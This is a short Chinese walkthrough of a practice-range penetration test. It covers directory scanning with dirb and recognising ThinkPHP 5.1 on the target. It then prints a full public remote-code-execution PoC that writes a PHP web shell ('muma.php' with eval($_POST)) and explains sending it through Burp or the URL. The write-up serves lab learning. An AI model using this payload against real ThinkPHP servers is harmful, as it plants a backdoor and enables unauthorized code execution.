首先拿到考核内容的ip之后,我们首先进行渗透测试的第一个内容就是 信息收集:
使用kali自带的dirb对目标网站进行一个扫描,同理,类似的软件还有dirsearch
当然,这里使用自带的也可以用,个人感觉,dirb好用一点:
小提示;就是考核用的靶场,大家就看看,了解一下应用的过程
然后根据扫出来的结果,访问一下这些页面:
发现这个是用的thinkphp5.1的版本,而我们知道的就是thinkphp5.x版本的都存在漏洞,这些漏洞都是被爆出来过的,所以,在这里,直接在网上就可以找到可以利用的漏洞poc
比如我找到的这个
s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1[]=muma.php&vars[1][]=%3C?php%20@eval($_POST['qwe']);?%3E
写出这个poc,可以通过burp抓包之后,上传上去,或者前面直接加上这个的网址,直接输入进去,